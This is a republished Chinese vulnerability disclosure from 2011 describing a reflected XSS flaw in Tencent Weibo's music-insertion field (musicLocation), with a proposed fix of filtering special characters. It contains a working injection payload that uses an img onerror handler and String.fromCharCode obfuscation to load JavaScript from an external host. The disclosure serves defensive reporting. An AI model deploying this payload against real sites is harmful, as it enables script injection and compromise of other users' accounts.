好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

腾讯微博反射型XSS漏洞及修复 - 网站安全 - 自学

简要描述:用户点击微博特定内容后,可在当前页面调用外部JS文件。 (还没帐号,留个昵称)--by gainover 2011/7/13 详细说明: 漏洞原因,微博中插入音乐时,未对音乐地址长度及内容做判断,导致可以构造脚本从而形成XSS.如下图:

   

漏洞证明:

 

以上是利用效果:

以下是调用外部JS的代码, 发布微博时,将musicLocation替换为以下代码即可

http://www.2cto.com"><img src='x' onerror='alert(1);var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,114,101,112,111,114,116,46,115,105,110,97,97,112,112,46,99,111,109,47,116,47,49,46,106,115);document.body.appendChild(s);'/><a href=" 修复方案:对publish.php 所接受的 musicLocation字段的内容进行特殊字符过滤

查看更多关于腾讯微博反射型XSS漏洞及修复 - 网站安全 - 自学的详细内容...

  阅读:46次